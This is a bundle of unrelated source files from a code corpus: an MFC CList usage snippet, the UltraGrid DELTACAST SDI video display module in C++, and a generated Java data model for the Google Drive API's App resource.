// Define myList. CList<CString,CString&> myList; // Add two elements to the list. myList.AddHead(CString(_T("ABC"))); myList.AddHead(CString(_T("123"))); // Dump the list elements to the debug window, // in reverse order. POSITION pos = myList.GetTailPosition(); for (int i = 0; i < myList.GetCount(); i++) { TRACE(_T("%s\r\n"), (LPCTSTR)myList.GetPrev(pos)); }
237
370
<reponame>thpryrchn/UltraGrid /** * @file video_display/deltacast.cpp * @author <NAME> <<EMAIL>> */ /* * Copyright (c) 2012-2019 CESNET, z. s. p. o. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, is permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * 3. Neither the name of CESNET nor the names of its contributors may be * used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE AUTHORS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, * BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO * EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifdef HAVE_CONFIG_H #include "config.h" #include "config_unix.h" #include "config_win32.h" #endif // HAVE_CONFIG_H #include "host.h" #include "debug.h" #include "deltacast_common.hpp" #include "lib_common.h" #include "tv.h" #include "video.h" #include "video_display.h" #include "debug.h" #include "audio/types.h" #include "audio/utils.h" #include "utils/ring_buffer.h" #include <algorithm> #define DELTACAST_MAGIC 0x01005e02 struct state_deltacast { uint32_t magic; struct timeval tv; struct video_frame *frame; struct tile *tile; unsigned long int frames; unsigned long int frames_last; bool initialized; HANDLE BoardHandle, StreamHandle; HANDLE SlotHandle; pthread_mutex_t lock; unsigned int play_audio:1; unsigned int audio_configured:1; VHD_AUDIOINFO AudioInfo; SHORT *pSample; struct audio_desc audio_desc; struct ring_buffer *audio_channels[16]; char *audio_tmp; }; static void show_help(void); static void show_help(void) { printf("deltacast (output) options:\n"); printf("\t-d deltacast[:device=<index>]\n"); print_available_delta_boards(); printf("\nDefault board is 0.\n"); } static struct video_frame * display_deltacast_getf(void *state) { struct state_deltacast *s = (struct state_deltacast *)state; BYTE *pBuffer; ULONG BufferSize; ULONG Result; assert(s->magic == DELTACAST_MAGIC); if(!s->initialized) return s->frame; Result = VHD_LockSlotHandle(s->StreamHandle, &s->SlotHandle); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unable to lock slot.\n"); return NULL; } Result = VHD_GetSlotBuffer(s->SlotHandle,VHD_SDI_BT_VIDEO,&pBuffer,&BufferSize); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unable to get buffer.\n"); return NULL; } s->tile->data = (char *) pBuffer; s->tile->data_len = BufferSize; return s->frame; } static int display_deltacast_putf(void *state, struct video_frame *frame, int nonblock) { struct state_deltacast *s = (struct state_deltacast *)state; struct timeval tv; int i; ULONG Result; UNUSED(frame); UNUSED(nonblock); assert(s->magic == DELTACAST_MAGIC); pthread_mutex_lock(&s->lock); if(s->play_audio && s->audio_configured) { /* Retrieve the number of needed samples */ for(i = 0; i < s->audio_desc.ch_count; ++i) { s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4].DataSize = 0; } Result = VHD_SlotEmbedAudio(s->SlotHandle,&s->AudioInfo); if (Result != VHDERR_BUFFERTOOSMALL) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot embed audio on TX0 stream. Result = 0x%08" PRIX32 "\n", Result); } else { for(i = 0; i < s->audio_desc.ch_count; ++i) { int ret; ret = ring_buffer_read(s->audio_channels[i], (char *) s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4].pData, s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4].DataSize); if(!ret) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Buffer underflow for channel %d.\n", i); } s->AudioInfo.pAudioGroups[0].pAudioChannels[0].DataSize = ret; } } /* Embed audio */ Result = VHD_SlotEmbedAudio(s->SlotHandle,&s->AudioInfo); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot embed audio on TX0 stream. Result = 0x%08" PRIX32 "\n",Result); } } pthread_mutex_unlock(&s->lock); VHD_UnlockSlotHandle(s->SlotHandle); s->SlotHandle = NULL; gettimeofday(&tv, NULL); double seconds = tv_diff(tv, s->tv); if (seconds > 5) { double fps = s->frames / seconds; log_msg(LOG_LEVEL_INFO, "[DELTACAST display] %lu frames in %g seconds = %g FPS\n", s->frames, seconds, fps); s->tv = tv; s->frames = 0; } s->frames++; return 0; } static int display_deltacast_reconfigure(void *state, struct video_desc desc) { struct state_deltacast *s = (struct state_deltacast *)state; int VideoStandard; int i; ULONG Result; if(s->initialized) { if(s->SlotHandle) VHD_UnlockSlotHandle(s->SlotHandle); VHD_StopStream(s->StreamHandle); VHD_CloseStreamHandle(s->StreamHandle); } assert(desc.tile_count == 1); s->tile->width = desc.width; s->tile->height = desc.height; s->frame->color_spec = desc.color_spec; s->frame->interlacing = desc.interlacing; s->frame->fps = desc.fps; for (i = 0; i < deltacast_frame_modes_count; ++i) { if(fabs(desc.fps - deltacast_frame_modes[i].fps) < 0.01 && desc.interlacing == deltacast_frame_modes[i].interlacing && desc.width == deltacast_frame_modes[i].width && desc.height == deltacast_frame_modes[i].height) { VideoStandard = deltacast_frame_modes[i].mode; log_msg(LOG_LEVEL_NOTICE, "[DELTACAST] %s mode selected.\n", deltacast_frame_modes[i].name); break; } } if(i == deltacast_frame_modes_count) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Failed to obtain video format for incoming video: %dx%d @ %2.2f %s\n", desc.width, desc.height, (double) desc.fps, get_interlacing_description(desc.interlacing)); goto error; } if(desc.color_spec == RAW) { Result = VHD_OpenStreamHandle(s->BoardHandle,VHD_ST_TX0,VHD_SDI_STPROC_RAW,NULL,&s->StreamHandle,NULL); } else if (s->play_audio == TRUE) { Result = VHD_OpenStreamHandle(s->BoardHandle,VHD_ST_TX0,VHD_SDI_STPROC_JOINED,NULL,&s->StreamHandle,NULL); } else { Result = VHD_OpenStreamHandle(s->BoardHandle,VHD_ST_TX0,VHD_SDI_STPROC_DISJOINED_VIDEO,NULL,&s->StreamHandle,NULL); } if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Failed to open stream handle.\n"); goto error; } VHD_SetStreamProperty(s->StreamHandle,VHD_SDI_SP_VIDEO_STANDARD,VideoStandard); VHD_SetStreamProperty(s->StreamHandle,VHD_CORE_SP_BUFFERQUEUE_DEPTH,2); VHD_SetStreamProperty(s->StreamHandle,VHD_CORE_SP_BUFFERQUEUE_PRELOAD,0); Result = VHD_StartStream(s->StreamHandle); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unable to start stream.\n"); goto error; } s->initialized = TRUE; return TRUE; error: return FALSE; } static void display_deltacast_probe(struct device_info **available_cards, int *count, void (**deleter)(void *)) { UNUSED(deleter); *count = 0; *available_cards = nullptr; ULONG Result,DllVersion,NbBoards; Result = VHD_GetApiInfo(&DllVersion,&NbBoards); if (Result != VHDERR_NOERROR) { return; } if (NbBoards == 0) { return; } /* Query DELTA boards information */ for (ULONG i = 0; i < NbBoards; i++) { ULONG BoardType; HANDLE BoardHandle = NULL; ULONG Result = VHD_OpenBoardHandle(i,&BoardHandle,NULL,0); VHD_GetBoardProperty(BoardHandle, VHD_CORE_BP_BOARD_TYPE, &BoardType); *count += 1; *available_cards = (struct device_info *) realloc(*available_cards, *count * sizeof(struct device_info)); memset(*available_cards + *count - 1, 0, sizeof(struct device_info)); sprintf((*available_cards)[*count - 1].dev, ":device=%d", *count - 1); sprintf((*available_cards)[*count - 1].dev, "\"embeddedAudioAvailable\":\"t\""); (*available_cards)[*count - 1].repeatable = false; if (Result == VHDERR_NOERROR) { std::string board{"Unknown DELTACAST type"}; auto it = board_type_map.find(BoardType); if (it != board_type_map.end()) { board = it->second; } snprintf((*available_cards)[*count - 1].name, sizeof (*available_cards)[*count - 1].name - 1, "DELTACAST %s", board.c_str()); VHD_CloseBoardHandle(BoardHandle); } } } static void *display_deltacast_init(struct module *parent, const char *fmt, unsigned int flags) { UNUSED(parent); struct state_deltacast *s; ULONG Result,DllVersion,NbBoards,ChnType; ULONG BrdId = 0; s = (struct state_deltacast *)calloc(1, sizeof(struct state_deltacast)); s->magic = DELTACAST_MAGIC; s->frame = vf_alloc(1); s->tile = vf_get_tile(s->frame, 0); s->frames = 0; gettimeofday(&s->tv, NULL); s->initialized = FALSE; if(flags & DISPLAY_FLAG_AUDIO_EMBEDDED) { s->play_audio = TRUE; } else { s->play_audio = FALSE; } s->BoardHandle = s->StreamHandle = s->SlotHandle = NULL; s->audio_configured = FALSE; if(fmt && strcmp(fmt, "help") == 0) { show_help(); vf_free(s->frame); free(s); return &display_init_noerr; } if(fmt) { char *tmp = strdup(fmt); char *save_ptr = NULL; char *tok; tok = strtok_r(tmp, ":", &save_ptr); if(!tok) { free(tmp); show_help(); goto error; } if (strncasecmp(tok, "device=", strlen("device=")) == 0) { BrdId = atoi(tok + strlen("device=")); } else { log_msg(LOG_LEVEL_ERROR, "Unknown option: %s\n\n", tok); free(tmp); show_help(); goto error; } free(tmp); } /* Query VideoMasterHD information */ Result = VHD_GetApiInfo(&DllVersion,&NbBoards); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot query VideoMasterHD" " information. Result = 0x%08" PRIX32 "\n", Result); goto error; } if (NbBoards == 0) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] No DELTA board detected, exiting...\n"); goto error; } if(BrdId >= NbBoards) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Wrong index %" PRIu32 ". Found %" PRIu32 " cards.\n", BrdId, NbBoards); goto error; } /* Open a handle on first DELTA-hd/sdi/codec board */ Result = VHD_OpenBoardHandle(BrdId,&s->BoardHandle,NULL,0); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot open DELTA board %" PRIu32 " handle. Result = 0x%08" PRIX32 "\n", BrdId, Result); goto error; } if (!delta_set_nb_channels(BrdId, s->BoardHandle, 0, 1)) { goto error; } VHD_GetBoardProperty(s->BoardHandle, VHD_CORE_BP_TX0_TYPE, &ChnType); if((ChnType!=VHD_CHNTYPE_SDSDI)&&(ChnType!=VHD_CHNTYPE_HDSDI)&&(ChnType!=VHD_CHNTYPE_3GSDI)) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : The selected channel is not an SDI one\n"); goto bad_channel; } /* Disable RX0-TX0 by-pass relay loopthrough */ VHD_SetBoardProperty(s->BoardHandle,VHD_CORE_BP_BYPASS_RELAY_0,FALSE); /* Select a 1/1 clock system */ VHD_SetBoardProperty(s->BoardHandle,VHD_SDI_BP_CLOCK_SYSTEM,VHD_CLOCKDIV_1); pthread_mutex_init(&s->lock, NULL); return s; bad_channel: VHD_CloseBoardHandle(s->BoardHandle); error: vf_free(s->frame); free(s); return NULL; } static void display_deltacast_run(void *state) { UNUSED(state); } static void display_deltacast_done(void *state) { struct state_deltacast *s = (struct state_deltacast *)state; if(s->initialized) { if(s->SlotHandle) VHD_UnlockSlotHandle(s->SlotHandle); VHD_StopStream(s->StreamHandle); VHD_CloseStreamHandle(s->StreamHandle); VHD_SetBoardProperty(s->BoardHandle,VHD_CORE_BP_BYPASS_RELAY_0,TRUE); VHD_CloseBoardHandle(s->BoardHandle); } vf_free(s->frame); free(s); } static int display_deltacast_get_property(void *state, int property, void *val, size_t *len) { UNUSED(state); codec_t codecs[] = {v210, UYVY, RAW}; interlacing_t supported_il_modes[] = {PROGRESSIVE, UPPER_FIELD_FIRST, SEGMENTED_FRAME}; int rgb_shift[] = {0, 8, 16}; switch (property) { case DISPLAY_PROPERTY_CODECS: if(sizeof(codecs) <= *len) { memcpy(val, codecs, sizeof(codecs)); } else { return FALSE; } *len = sizeof(codecs); break; case DISPLAY_PROPERTY_RGB_SHIFT: if(sizeof(rgb_shift) > *len) { return FALSE; } memcpy(val, rgb_shift, sizeof(rgb_shift)); *len = sizeof(rgb_shift); break; case DISPLAY_PROPERTY_BUF_PITCH: *(int *) val = PITCH_DEFAULT; *len = sizeof(int); break; case DISPLAY_PROPERTY_SUPPORTED_IL_MODES: if(sizeof(supported_il_modes) <= *len) { memcpy(val, supported_il_modes, sizeof(supported_il_modes)); } else { return FALSE; } *len = sizeof(supported_il_modes); break; case DISPLAY_PROPERTY_AUDIO_FORMAT: { assert(*len == sizeof(struct audio_desc)); struct audio_desc *desc = (struct audio_desc *) val; desc->sample_rate = 48000; desc->ch_count = std::max(desc->ch_count, 16); desc->codec = AC_PCM; desc->bps = desc->bps < 3 ? 2 : 3; } break; default: return FALSE; } return TRUE; } static int display_deltacast_reconfigure_audio(void *state, int quant_samples, int channels, int sample_rate) { struct state_deltacast *s = (struct state_deltacast *)state; int i; assert(channels <= 16); pthread_mutex_lock(&s->lock); s->audio_configured = FALSE; for(i = 0; i < 16; ++i) { ring_buffer_destroy(s->audio_channels[i]); s->audio_channels[i] = NULL; } free(s->audio_tmp); s->audio_desc.bps = quant_samples / 8; s->audio_desc.ch_count = channels; s->audio_desc.sample_rate = sample_rate; for(i = 0; i < channels; ++i) { s->audio_channels[i] = ring_buffer_init(s->audio_desc.bps * s->audio_desc.sample_rate); } s->audio_tmp = (char *) malloc(s->audio_desc.bps * s->audio_desc.sample_rate); /* Configure audio info */ memset(&s->AudioInfo, 0, sizeof(VHD_AUDIOINFO)); for(i = 0; i < channels; ++i) { VHD_AUDIOCHANNEL *pAudioChn=NULL; pAudioChn = &s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4]; pAudioChn->Mode = VHD_AM_MONO; switch(quant_samples) { case 16: pAudioChn->BufferFormat = VHD_AF_16; break; case 20: pAudioChn->BufferFormat = VHD_AF_20; break; case 24: pAudioChn->BufferFormat = VHD_AF_24; break; default: log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unsupported PCM audio: %d bits.\n", quant_samples); pthread_mutex_unlock(&s->lock); return FALSE; } pAudioChn->pData = new BYTE[s->audio_desc.bps * s->audio_desc.sample_rate]; } s->audio_configured = TRUE; pthread_mutex_unlock(&s->lock); return TRUE; } static void display_deltacast_put_audio_frame(void *state, struct audio_frame *frame) { struct state_deltacast *s = (struct state_deltacast *)state; int i; int channel_len = frame->data_len / frame->ch_count; pthread_mutex_lock(&s->lock); for(i = 0; i < frame->ch_count; ++i) { demux_channel(s->audio_tmp, frame->data, frame->bps, frame->data_len, frame->ch_count, i); ring_buffer_write(s->audio_channels[i], s->audio_tmp, channel_len); } pthread_mutex_unlock(&s->lock); } static const struct video_display_info display_deltacast_info = { display_deltacast_probe, display_deltacast_init, display_deltacast_run, display_deltacast_done, display_deltacast_getf, display_deltacast_putf, display_deltacast_reconfigure, display_deltacast_get_property, display_deltacast_put_audio_frame, display_deltacast_reconfigure_audio, DISPLAY_DOESNT_NEED_MAINLOOP, }; REGISTER_MODULE(deltacast, &display_deltacast_info, LIBRARY_CLASS_VIDEO_DISPLAY, VIDEO_DISPLAY_ABI_VERSION);
11,700
372
<reponame>arithmetic1728/google-api-java-client-services /* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.drive.model; /** * The apps resource provides a list of the apps that a user has installed, with information about * each app's supported MIME types, file extensions, and other details. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Drive API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class App extends com.google.api.client.json.GenericJson { /** * Whether the app is authorized to access data on the user's Drive. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean authorized; /** * The template url to create a new file with this app in a given folder. The template will * contain {folderId} to be replaced by the folder to create the new file in. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String createInFolderTemplate; /** * The url to create a new file with this app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String createUrl; /** * Whether the app has drive-wide scope. An app with drive-wide scope can access all files in the * user's drive. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean hasDriveWideScope; /** * The various icons for the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<Icons> icons; static { // hack to force ProGuard to consider Icons used, since otherwise it would be stripped out // see https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(Icons.class); } /** * The ID of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String id; /** * Whether the app is installed. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean installed; /** * This is always drive#app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String kind; /** * A long description of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String longDescription; /** * The name of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * The type of object this app creates (e.g. Chart). If empty, the app name should be used * instead. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String objectType; /** * The template url for opening files with this app. The template will contain {ids} and/or * {exportIds} to be replaced by the actual file ids. See Open Files for the full documentation. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String openUrlTemplate; /** * The list of primary file extensions. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> primaryFileExtensions; /** * The list of primary mime types. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> primaryMimeTypes; /** * The ID of the product listing for this app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String productId; /** * A link to the product listing for this app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String productUrl; /** * The list of secondary file extensions. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> secondaryFileExtensions; /** * The list of secondary mime types. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> secondaryMimeTypes; /** * A short description of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String shortDescription; /** * Whether this app supports creating new objects. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsCreate; /** * Whether this app supports importing from Docs Editors. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsImport; /** * Whether this app supports opening more than one file. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsMultiOpen; /** * Whether this app supports creating new files when offline. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsOfflineCreate; /** * Whether the app is selected as the default handler for the types it supports. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean useByDefault; /** * Whether the app is authorized to access data on the user's Drive. * @return value or {@code null} for none */ public java.lang.Boolean getAuthorized() { return authorized; } /** * Whether the app is authorized to access data on the user's Drive. * @param authorized authorized or {@code null} for none */ public App setAuthorized(java.lang.Boolean authorized) { this.authorized = authorized; return this; } /** * The template url to create a new file with this app in a given folder. The template will * contain {folderId} to be replaced by the folder to create the new file in. * @return value or {@code null} for none */ public java.lang.String getCreateInFolderTemplate() { return createInFolderTemplate; } /** * The template url to create a new file with this app in a given folder. The template will * contain {folderId} to be replaced by the folder to create the new file in. * @param createInFolderTemplate createInFolderTemplate or {@code null} for none */ public App setCreateInFolderTemplate(java.lang.String createInFolderTemplate) { this.createInFolderTemplate = createInFolderTemplate; return this; } /** * The url to create a new file with this app. * @return value or {@code null} for none */ public java.lang.String getCreateUrl() { return createUrl; } /** * The url to create a new file with this app. * @param createUrl createUrl or {@code null} for none */ public App setCreateUrl(java.lang.String createUrl) { this.createUrl = createUrl; return this; } /** * Whether the app has drive-wide scope. An app with drive-wide scope can access all files in the * user's drive. * @return value or {@code null} for none */ public java.lang.Boolean getHasDriveWideScope() { return hasDriveWideScope; } /** * Whether the app has drive-wide scope. An app with drive-wide scope can access all files in the * user's drive. * @param hasDriveWideScope hasDriveWideScope or {@code null} for none */ public App setHasDriveWideScope(java.lang.Boolean hasDriveWideScope) { this.hasDriveWideScope = hasDriveWideScope; return this; } /** * The various icons for the app. * @return value or {@code null} for none */ public java.util.List<Icons> getIcons() { return icons; } /** * The various icons for the app. * @param icons icons or {@code null} for none */ public App setIcons(java.util.List<Icons> icons) { this.icons = icons; return this; } /** * The ID of the app. * @return value or {@code null} for none */ public java.lang.String getId() { return id; } /** * The ID of the app. * @param id id or {@code null} for none */ public App setId(java.lang.String id) { this.id = id; return this; } /** * Whether the app is installed. * @return value or {@code null} for none */ public java.lang.Boolean getInstalled() { return installed; } /** * Whether the app is installed. * @param installed installed or {@code null} for none */ public App setInstalled(java.lang.Boolean installed) { this.installed = installed; return this; } /** * This is always drive#app. * @return value or {@code null} for none */ public java.lang.String getKind() { return kind; } /** * This is always drive#app. * @param kind kind or {@code null} for none */ public App setKind(java.lang.String kind) { this.kind = kind; return this; } /** * A long description of the app. * @return value or {@code null} for none */ public java.lang.String getLongDescription() { return longDescription; } /** * A long description of the app. * @param longDescription longDescription or {@code null} for none */ public App setLongDescription(java.lang.String longDescription) { this.longDescription = longDescription; return this; } /** * The name of the app. * @return value or {@code null} for none */ public java.lang.String getName() { return name; } /** * The name of the app. * @param name name or {@code null} for none */ public App setName(java.lang.String name) { this.name = name; return this; } /** * The type of object this app creates (e.g. Chart). If empty, the app name should be used * instead. * @return value or {@code null} for none */ public java.lang.String getObjectType() { return objectType; } /** * The type of object this app creates (e.g. Chart). If empty, the app name should be used * instead. * @param objectType objectType or {@code null} for none */ public App setObjectType(java.lang.String objectType) { this.objectType = objectType; return this; } /** * The template url for opening files with this app. The template will contain {ids} and/or * {exportIds} to be replaced by the actual file ids. See Open Files for the full documentation. * @return value or {@code null} for none */ public java.lang.String getOpenUrlTemplate() { return openUrlTemplate; } /** * The template url for opening files with this app. The template will contain {ids} and/or * {exportIds} to be replaced by the actual file ids. See Open Files for the full documentation. * @param openUrlTemplate openUrlTemplate or {@code null} for none */ public App setOpenUrlTemplate(java.lang.String openUrlTemplate) { this.openUrlTemplate = openUrlTemplate; return this; } /** * The list of primary file extensions. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getPrimaryFileExtensions() { return primaryFileExtensions; } /** * The list of primary file extensions. * @param primaryFileExtensions primaryFileExtensions or {@code null} for none */ public App setPrimaryFileExtensions(java.util.List<java.lang.String> primaryFileExtensions) { this.primaryFileExtensions = primaryFileExtensions; return this; } /** * The list of primary mime types. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getPrimaryMimeTypes() { return primaryMimeTypes; } /** * The list of primary mime types. * @param primaryMimeTypes primaryMimeTypes or {@code null} for none */ public App setPrimaryMimeTypes(java.util.List<java.lang.String> primaryMimeTypes) { this.primaryMimeTypes = primaryMimeTypes; return this; } /** * The ID of the product listing for this app. * @return value or {@code null} for none */ public java.lang.String getProductId() { return productId; } /** * The ID of the product listing for this app. * @param productId productId or {@code null} for none */ public App setProductId(java.lang.String productId) { this.productId = productId; return this; } /** * A link to the product listing for this app. * @return value or {@code null} for none */ public java.lang.String getProductUrl() { return productUrl; } /** * A link to the product listing for this app. * @param productUrl productUrl or {@code null} for none */ public App setProductUrl(java.lang.String productUrl) { this.productUrl = productUrl; return this; } /** * The list of secondary file extensions. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getSecondaryFileExtensions() { return secondaryFileExtensions; } /** * The list of secondary file extensions. * @param secondaryFileExtensions secondaryFileExtensions or {@code null} for none */ public App setSecondaryFileExtensions(java.util.List<java.lang.String> secondaryFileExtensions) { this.secondaryFileExtensions = secondaryFileExtensions; return this; } /** * The list of secondary mime types. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getSecondaryMimeTypes() { return secondaryMimeTypes; } /** * The list of secondary mime types. * @param secondaryMimeTypes secondaryMimeTypes or {@code null} for none */ public App setSecondaryMimeTypes(java.util.List<java.lang.String> secondaryMimeTypes) { this.secondaryMimeTypes = secondaryMimeTypes; return this; } /** * A short description of the app. * @return value or {@code null} for none */ public java.lang.String getShortDescription() { return shortDescription; } /** * A short description of the app. * @param shortDescription shortDescription or {@code null} for none */ public App setShortDescription(java.lang.String shortDescription) { this.shortDescription = shortDescription; return this; } /** * Whether this app supports creating new objects. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsCreate() { return supportsCreate; } /** * Whether this app supports creating new objects. * @param supportsCreate supportsCreate or {@code null} for none */ public App setSupportsCreate(java.lang.Boolean supportsCreate) { this.supportsCreate = supportsCreate; return this; } /** * Whether this app supports importing from Docs Editors. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsImport() { return supportsImport; } /** * Whether this app supports importing from Docs Editors. * @param supportsImport supportsImport or {@code null} for none */ public App setSupportsImport(java.lang.Boolean supportsImport) { this.supportsImport = supportsImport; return this; } /** * Whether this app supports opening more than one file. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsMultiOpen() { return supportsMultiOpen; } /** * Whether this app supports opening more than one file. * @param supportsMultiOpen supportsMultiOpen or {@code null} for none */ public App setSupportsMultiOpen(java.lang.Boolean supportsMultiOpen) { this.supportsMultiOpen = supportsMultiOpen; return this; } /** * Whether this app supports creating new files when offline. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsOfflineCreate() { return supportsOfflineCreate; } /** * Whether this app supports creating new files when offline. * @param supportsOfflineCreate supportsOfflineCreate or {@code null} for none */ public App setSupportsOfflineCreate(java.lang.Boolean supportsOfflineCreate) { this.supportsOfflineCreate = supportsOfflineCreate; return this; } /** * Whether the app is selected as the default handler for the types it supports. * @return value or {@code null} for none */ public java.lang.Boolean getUseByDefault() { return useByDefault; } /** * Whether the app is selected as the default handler for the types it supports. * @param useByDefault useByDefault or {@code null} for none */ public App setUseByDefault(java.lang.Boolean useByDefault) { this.useByDefault = useByDefault; return this; } @Override public App set(String fieldName, Object value) { return (App) super.set(fieldName, value); } @Override public App clone() { return (App) super.clone(); } /** * Model definition for AppIcons. */ public static final class Icons extends com.google.api.client.json.GenericJson { /** * Category of the icon. Allowed values are: - application - icon for the application - document * - icon for a file associated with the app - documentShared - icon for a shared file associated * with the app * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String category; /** * URL for the icon. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String iconUrl; /** * Size of the icon. Represented as the maximum of the width and height. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer size; /** * Category of the icon. Allowed values are: - application - icon for the application - document * - icon for a file associated with the app - documentShared - icon for a shared file associated * with the app * @return value or {@code null} for none */ public java.lang.String getCategory() { return category; } /** * Category of the icon. Allowed values are: - application - icon for the application - document * - icon for a file associated with the app - documentShared - icon for a shared file associated * with the app * @param category category or {@code null} for none */ public Icons setCategory(java.lang.String category) { this.category = category; return this; } /** * URL for the icon. * @return value or {@code null} for none */ public java.lang.String getIconUrl() { return iconUrl; } /** * URL for the icon. * @param iconUrl iconUrl or {@code null} for none */ public Icons setIconUrl(java.lang.String iconUrl) { this.iconUrl = iconUrl; return this; } /** * Size of the icon. Represented as the maximum of the width and height. * @return value or {@code null} for none */ public java.lang.Integer getSize() { return size; } /** * Size of the icon. Represented as the maximum of the width and height. * @param size size or {@code null} for none */ public Icons setSize(java.lang.Integer size) { this.size = size; return this; } @Override public Icons set(String fieldName, Object value) { return (Icons) super.set(fieldName, value); } @Override public Icons clone() { return (Icons) super.clone(); } } }
6,735
791
